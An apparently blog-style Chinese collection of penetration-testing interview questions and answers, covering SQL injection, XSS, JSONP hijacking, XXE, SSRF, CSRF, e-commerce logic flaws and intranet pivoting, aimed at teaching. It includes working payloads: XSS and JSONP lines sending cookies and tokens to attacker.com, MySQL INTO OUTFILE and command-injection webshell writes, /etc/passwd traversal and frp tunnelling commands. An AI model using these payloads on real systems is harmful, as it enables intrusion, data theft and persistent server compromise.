2025年渗透测试面试题总结-70(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
1. SQL注入
2. XSS攻击
3. JSONP劫持
4. XXE漏洞
5. Getshell姿势速查
6. 漏洞挖掘实战(案例)
7. 电商逻辑漏洞
8. APP密码重置漏洞
9. 经典逻辑漏洞案例
10. SSRF漏洞
11. APP Web漏洞挖掘
12. 通用漏洞利用记录
13. 同源策略与CORS
14. CSRF攻防
15. Web漏洞挖掘流程
16. 内网渗透工具链
17. MySQL导出Webshell
1、SQL注入的成因、代码层防御方式 2、XSS的成因、代码层防御方式、写出3条xsspayload 3、Jsonp劫持漏洞的原理、利用方式、防御方法 4、XXE漏洞的原理、危害、防御方法 5、getshell的姿势(SQL注入、文件包含、文件上传、命令执行、后台getsehll等) 6、在SRC、补天、盒子、乌云等都提交了哪些高中危漏洞,说说挖这些漏洞的方法。 7、说明电商系统的加车、下单、支付过程中,常见的逻辑漏洞有哪些,如何挖掘 8、APP常见任意密码重置漏洞的挖掘方法 9、挖掘过哪些逻辑漏洞,请说明挖洞方法 10、SSRF漏洞的成因、利用方法、防御方式 11、挖掘过哪些APP的web漏洞(非逆向),如何挖掘的 12、利用的过的通用漏洞有哪些?包括CMS、web中间件、操作系统、DB等 13、同源策略,有什么作用?同源策略中Access-Control-Allow-Origin的作用是什么 14、CSRF的成因、利用方式、哪些功能容易有CSRF,防御方法 15、挖掘Web漏洞的流程和思路,是当完成信息收集之后,开始挖洞的思路 16、获取Web shell后,是否做过内网渗透,你用哪些正向代理、反向代理工具,这些工具如何使用 17、写出Mysql导出php一句话木马的命令
1. SQL注入
- 成因:未过滤用户输入的SQL参数,导致恶意SQL拼接
- 代码层防御:
- 参数化查询(
PreparedStatement
)- 输入过滤(正则过滤
'";\-#
等字符)- 最小权限原则(DB账户禁用DROP/ALTER权限)
- 框架级防御(如MyBatis的
#{}
占位符)
2. XSS攻击
- 成因:未转义用户输入的HTML/JS内容,导致脚本在浏览器执行
- 防御方案:
- 输出编码(HTML实体化:
< → <
)- CSP策略(
Content-Security-Policy: default-src 'self'
)- HttpOnly Cookie(阻止JS读取敏感Cookie)
- XSS Payload示例:
html
<script>alert(document.cookie)</script> <!-- 窃取Cookie --> <img src=x onerror="fetch('https://attacker.com?data='+localStorage.token)"> <!-- 窃取本地存储 --> <svg/onload="location.href='https://phish.com?c='+btoa(document.body.innerHTML)"> <!-- 页面劫持 -->
3. JSONP劫持
- 原理:利用
<script>
标签跨域特性窃取JSONP回调数据- 利用方式:
html
<script> function stealData(data){ fetch('https://attacker.com?data='+JSON.stringify(data)) </script> <script src="https://target.com/api?callback=stealData"></script>
- 防御:验证Referer头 || 使用CSRF Token || 弃用JSONP改用CORS
4. XXE漏洞
- 原理:解析恶意XML实体导致文件读取/SSRF
- 危害:
- 读取
file:///etc/passwd
- 内网端口扫描(
<!ENTITY xxe SYSTEM "http://192.168.1.1:8080">
)- 拒绝服务(Billion Laughs攻击)
- 防御:禁用DTD(
XMLParser.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)
)
5. Getshell姿势速查
漏洞类型 利用方式示例 SQL注入 SELECT '<?php @eval($_POST[cmd])?>' INTO OUTFILE '/var/www/shell.php'
文件包含 ?file=php://filter/convert.base64-encode/resource=../../../../etc/passwd
文件上传 绕过MIME检测上传 .jpg.php
双后缀马命令执行 ;echo "<?php system($_GET['c']);?>" > shell.php
后台Getshell 利用CMS管理后台的模板编辑功能写入Webshell
6. 漏洞挖掘实战(案例)
- 提交漏洞类型:
- SRC:支付逻辑漏洞(0元购)
- 补天:Fastjson反序列化RCE
- 乌云历史:Struts2 S2-045
- 方法论:
- 资产测绘(FOFA搜索特定组件)
- 版本比对(比对CVE影响范围)
- 流量分析(BurpSuite抓包重放异常参数)
7. 电商逻辑漏洞
- 加车环节:
- 负数商品导致金额为负(
quantity=-100
)- 修改价格参数(
price=0.01
)- 下单环节:
- 重复提交订单(并发请求)
- 优惠券无限复用(未校验状态)
- 支付环节:
- 支付状态未同步(伪造成功回调)
- 金额篡改(前端验证绕过)
- 挖掘技巧:
- 对比前端/后端价格校验差异
- 遍历订单状态码(如
status=success
)
8. APP密码重置漏洞
- 短信验证码爆破(4位验证码未限速)
- 邮箱劫持(修改
Host
头指向自建SMTP)- 身份混淆(修改请求包中的
userid=其他用户ID
)- Token泄漏(重置链接中Token可预测)
9. 经典逻辑漏洞案例
- 越权删除:
- 删除接口未校验归属权(
DELETE /api/order?id=123
)- 条件竞争:
- 余额提现未加锁(高频请求导致超额提现)
- 步骤绕过:
- 直接访问支付完成页跳过支付流程
10. SSRF漏洞
- 成因:服务端请求用户可控的URL
- 利用:
- 内网探测(
http://192.168.0.1:8080
)- 云元数据窃取(
http://169.254.169.254
)- Gopher协议攻击Redis(写SSH密钥)
- 防御:
- 禁用非常规协议(file/gopher)
- 设置URL白名单
- 启用DNS重绑定防护
11. APP Web漏洞挖掘
- 漏洞类型:JWT密钥硬编码、接口未授权访问
- 方法:
- 抓包分析(BurpSuite + 手机代理)
- 反编译查看网络配置(搜索
baseUrl
)- 接口FUZZ(使用Intruder爆破API路径)
12. 通用漏洞利用记录
类型 漏洞实例 CMS ThinkPHP 5.0.23 RCE Web中间件 Apache Solr Velocity RCE 操作系统 Sudo提权漏洞(CVE-2021-3156) 数据库 PostgreSQL COPY TO PROGRAM RCE
13. 同源策略与CORS
- 同源策略:禁止跨域读取资源(协议+域名+端口一致)
- Access-Control-Allow-Origin:
*
:允许所有域(危险!)https://trusted.com
:指定可信源(推荐)- 缺失时浏览器拦截跨域响应
14. CSRF攻防
- 成因:敏感操作未校验请求来源
- 高危功能:修改密码、转账、邮箱绑定
- 防御:
- 添加CSRF Token(同步令牌模式)
- 校验Referer头
- 关键操作要求二次认证
15. Web漏洞挖掘流程
mermaid
graph TD A[信息收集] --> B(子域名/端口扫描) B --> C[指纹识别] C --> D{漏洞类型决策} D -->|常规漏洞| E[自动化扫描:AWVS/SQLMap] D -->|逻辑漏洞| F[手动测试:BurpSuite重放/修改参数] F --> G[重点路径:登录/支付/权限] G --> H[异常参数测试:越权/竞争/溢出]
16. 内网渗透工具链
- 正向代理:
- Proxifier:强制指定应用流量走代理
- 配置:
代理服务器 → 内网跳板IP:1080
- 反向代理:
- frp:将内网服务映射到公网
- 命令:
frpc.exe -t 公网IP -p 7000 -u test -w pass
- Ngrok:快速HTTP隧道(
ngrok http 80
)
17. MySQL导出Webshell
sql
SELECT '<?php @eval($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/shell.php' LINES TERMINATED BY '\n';